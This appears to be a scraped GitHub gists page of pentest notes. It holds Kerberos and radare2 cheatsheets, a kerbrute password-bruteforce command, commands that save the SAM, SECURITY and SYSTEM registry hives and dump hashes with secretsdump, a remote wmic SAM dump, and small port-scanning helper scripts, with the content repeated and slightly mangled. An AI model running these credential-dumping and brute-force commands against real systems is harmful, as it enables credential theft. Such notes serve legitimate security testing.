Adam Dekan adamdekan

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                adamdekan
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              January 12, 2024 12:27
                — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## yet another radare2 cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                adamdekan
                / yet another radare2 cheatsheet.md
            
            
              Last active
              December 29, 2023 10:59
                — forked from williballenthin/yet another radare2 cheatsheet.md
            
          
    radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

analyze all: aa
show sections: iS
list functions: afl
list imports: ii
list entrypoints: ie
seek to function: s sym.main


## hashdump.reg
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"

## rscan.sh
#!/bin/bash

# Check if the correct number of arguments is provided
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <target_host> <output_folder>"
    exit 1
fi

# Replace 'localhost' with the target host parameter
rustscan -a "$1" -g | sed 's/.*\[\(.*\)\].*/\1/' | xargs python3 ~/python/portidentify.py -o "$2"

## obs.sh
cmd () {
  arg=${1}
  print -z -- $(rg ^$1 ~/obsidian/ |  sed 's/^[^:]*://' | fzf )
}

## portidentiy.py
import csv
import argparse
import os

parser = argparse.ArgumentParser()
parser.add_argument('number', type=str)
parser.add_argument('-o', type=str, help='Output folder for files')
args = parser.parse_args()
ports = args.number.split(',')
	reg.exe save hklm\sam c:\temp\sam.save
	reg.exe save hklm\security c:\temp\security.save
	reg.exe save hklm\system c:\temp\system.save
	secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

	#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

	#Do this remotely
	wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"
	#!/bin/bash

	# Check if the correct number of arguments is provided
	if [ "$#" -ne 2 ]; then
	echo "Usage: $0 <target_host> <output_folder>"
	exit 1
	fi

	# Replace 'localhost' with the target host parameter
	rustscan -a "$1" -g \| sed 's/.\[\(.\)\].*/\1/' \| xargs python3 ~/python/portidentify.py -o "$2"
	cmd () {
	arg=${1}
	print -z -- $(rg ^$1 ~/obsidian/ \| sed 's/^[^:]*://' \| fzf )
	}
	import csv
	import argparse
	import os

	parser = argparse.ArgumentParser()
	parser.add_argument('number', type=str)
	parser.add_argument('-o', type=str, help='Output folder for files')
	args = parser.parse_args()
	ports = args.number.split(',')